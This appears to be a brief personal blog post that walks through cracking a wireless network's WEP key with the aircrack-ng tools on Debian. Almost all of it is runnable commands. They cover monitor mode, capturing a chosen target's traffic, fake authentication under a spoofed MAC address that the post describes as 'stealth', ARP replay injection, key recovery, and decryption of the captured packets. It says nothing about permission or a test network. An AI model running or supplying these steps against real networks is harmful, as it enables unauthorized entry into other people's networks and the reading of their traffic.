RSSBreaking WEP Encryption
Mar 19
Linux General, Networking, Wireless Comments Off
Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…
- Stop network manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID, SSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
- Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
- aireplay-ng –fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one mon0
- aireplay-ng –arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one -e SSID mon0
- when this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
- After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
- The WEP key should then be displayed in the terminal window.
- The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
- Exit monitor mode: airmon-ng stop mon0